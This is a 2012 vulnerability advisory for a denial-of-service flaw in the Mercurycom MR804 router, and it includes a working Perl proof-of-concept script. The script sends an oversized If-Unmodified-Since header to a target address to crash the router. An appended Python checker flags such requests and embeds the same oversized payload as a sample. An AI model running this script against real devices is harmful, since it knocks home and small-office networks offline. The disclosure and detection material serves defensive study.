Mercurycom MR804 Router Denial Of Service
Source: demonalex@163.com  Author: demonalex  Published: 2012-02-23
Title: Mercurycom MR804 Router -  Multiple HTTP Header Fields Denial Of Service Vulnerability

Product : Mercurycom MR804 Router

Hardware Version : MR804 v8.0 081C3113

Software Version : 3.8.1 Build 101220 Rel.53006nB

Vendor: http://www.mercurycom.com.cn/

Class:  Boundary Condition Error  

CVE:
 
Remote:  Yes  

Local:  No  

Published:  2012-02-21

Updated:  

Impact : Medium (CVSS2 Base : 6.1, AV:A/AC:L/Au:N/C:N/I:N/A:C)

Bug Description :
Mercurycom routers are commonly used for internet connectivity in homes and small offices (http://www.mercurycom.com.cn/Product/list).
The HTTP service of the Mercurycom MR804 router contains a denial of service vulnerability in its handling of HTTP header fields
(such as If-Modified-Since, If-None-Match, If-Unmodified-Since, etc.).

POC:
#-------------------------------------------------------------
#!/usr/bin/perl -w
use Socket;
$|=1;
print '*********************************'."\n";
print '* mercurycom MR804 v8.0 DoS PoC *'."\n";
print '*  writed by demonalex@163.com  *'."\n";
print '*********************************'."\n";
$evil='A'x4097;
$test_ip=shift;                           #target ip
$test_port=shift;                         #target port
if(!defined($test_ip) || !defined($test_port)){
	die "usage : $0 target_ip target_port\n";
}
$test_payload=
"GET / HTTP/1.0\r\n".
"Accept: */*\r\n".
"Accept-Language: zh-cn\r\n".
"UA-CPU: x86\r\n".
"If-Unmodified-Since: ".$evil."\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322;".
" .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)\r\n".
"Host: ".$test_ip."\r\n".
"Connection: Keep-Alive"."\r\n\r\n";
$test_target=inet_aton($test_ip);
$test_target=sockaddr_in($test_port, $test_target);
socket(SOCK, AF_INET, SOCK_STREAM, 6) || die "cannot create socket!\n";
connect(SOCK, $test_target) || die "cannot connect the target!\n";
send(SOCK, $test_payload, 0) || die "cannot send the payload!\n";
#recv(SOCK, $test_payload, 100, 0);
close(SOCK);
print "done!\n";
exit(0);                                  #normal termination
#-------------------------------------------------------------

Credits : This vulnerability was discovered by demonalex@163.com
mail: demonalex@163.com / ChaoYi.Huang@connect.polyu.hk
Pentester/Researcher
Dark2S Security Team/PolyU.HK
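
Added example, not part of the original advisory and not vendor code: a Python check that screens raw HTTP requests (for instance at a filtering proxy or over captured traffic) for the oversized header values described above. It goes slightly beyond the advisory by also rejecting non-date values in the date-based conditional headers. The names `inspect_request` and `MAX_VALUE_LEN`, the 1024-byte limit and the sample requests are assumptions constructed for illustration.

```python
from email.utils import parsedate_to_datetime

MAX_VALUE_LEN = 1024  # assumed policy limit, not a vendor figure
DATE_HEADERS = {"if-modified-since", "if-unmodified-since"}


def is_http_date(value: str) -> bool:
    """True if the value parses as an RFC 5322 / HTTP style date."""
    try:
        parsedate_to_datetime(value)
        return True
    except (TypeError, ValueError):
        return False


def inspect_request(raw: bytes, max_len: int = MAX_VALUE_LEN) -> list:
    """Return findings for one raw HTTP request; an empty list means clean."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    findings = []
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(b":")
        if not sep:
            findings.append("malformed header line")
            continue
        name_s = name.decode("latin-1").strip().lower()
        value_s = value.decode("latin-1").strip()
        if len(value_s) > max_len:
            findings.append(f"{name_s}: value length {len(value_s)} exceeds {max_len}")
        elif name_s in DATE_HEADERS and not is_http_date(value_s):
            findings.append(f"{name_s}: not a valid HTTP-date")
    return findings


# Constructed sample requests (192.0.2.1 is a documentation address).
BENIGN = (b"GET / HTTP/1.0\r\nHost: 192.0.2.1\r\n"
          b"If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT\r\n\r\n")
OVERSIZED = (b"GET / HTTP/1.0\r\nHost: 192.0.2.1\r\n"
             b"If-Unmodified-Since: " + b"A" * 4097 + b"\r\n\r\n")
BAD_DATE = (b"GET / HTTP/1.0\r\nHost: 192.0.2.1\r\n"
            b"If-Modified-Since: not-a-date\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("oversized", OVERSIZED), ("bad date", BAD_DATE)):
        print(label, inspect_request(req))
```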

 